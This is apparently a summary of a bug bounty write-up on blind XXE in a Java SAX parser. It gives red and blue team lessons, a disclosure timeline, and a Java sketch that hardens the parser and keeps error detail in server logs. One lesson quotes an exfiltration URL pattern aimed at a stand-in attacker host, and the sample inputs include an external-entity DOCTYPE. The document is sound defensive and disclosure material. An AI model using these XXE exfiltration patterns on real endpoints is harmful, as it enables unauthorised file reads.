From blind XXE to root-level file read access

XXE

On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation.

https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/

June 23, 2024, 11:27 p.m. - by quas

Lessons learned

Red team
If something seems odd, keep digging;
Interesting handling of URL schemes by the Java SAX parser allows for some novel ways to extract information. Whereas modern Java versions do not allow multi-line files to be exfiltrated as the path of an external HTTP request (i.e. http://attacker.org/?&file;), it is possible to get a multi-line response in error messages, and even in the protocol of a URL.
Blue team
Make sure internal servers are patched as diligently as public-facing ones;
Don’t treat an internal network as one trusted secure zone, but employ adequate network segmentation;
Write detailed error messages to error logs, not HTTP responses;
Relying on authentication will not necessarily mitigate lower-level issues like XXE.
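
As an added illustration of the blue team points above (not code from the original write-up), the sketch below configures a Java SAX parser to reject DOCTYPE declarations and keeps parser error detail in the server log instead of the HTTP response. The class name, method names, response strings and sample inputs are assumptions made for this example.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical endpoint helper; names are illustrative, not from the write-up.
public class HardenedSaxEndpoint {
    private static final Logger LOG = Logger.getLogger("xml-endpoint");

    // Build a SAX parser that refuses any DOCTYPE, so neither general nor
    // parameter entities can be declared to point at file or network resources.
    static SAXParser newHardenedParser() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case the DOCTYPE ban is ever relaxed.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f.newSAXParser();
    }

    // Returns the text sent to the client. The exception message, which can
    // echo resolved entity content, is written to the server log only.
    static String handle(byte[] body) {
        try {
            newHardenedParser().parse(new ByteArrayInputStream(body), new DefaultHandler());
            return "200 OK";
        } catch (Exception e) {
            LOG.log(Level.WARNING, "XML request rejected", e);
            return "400 Bad Request: invalid XML";
        }
    }

    public static void main(String[] args) {
        // Constructed sample inputs: one plain document, one carrying a DOCTYPE.
        String benign = "<order><id>1</id></order>";
        String withDoctype =
            "<!DOCTYPE r [<!ENTITY e SYSTEM \"file:///constructed/placeholder\">]><r>&e;</r>";
        System.out.println(handle(benign.getBytes(StandardCharsets.UTF_8)));
        System.out.println(handle(withDoctype.getBytes(StandardCharsets.UTF_8)));
    }
}
```

The second input is rejected at the DOCTYPE before any entity is resolved, and the client sees only the generic 400 text.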

Timeline

26/Nov/18 – First noticed the interesting XML endpoint;
28/Nov/18 – Reported as blind XXE: possible to enumerate files, directories, internal network locations and open ports;
03/Dec/18 – Found vulnerable internal Confluence server, reported POC illustrating ability to elevate to read-as-root access;
04/Dec/18 – Fixed and bounty awarded;
06/Dec/18 – Requested permission to publish write-up;
12/Dec/18 – Permission granted.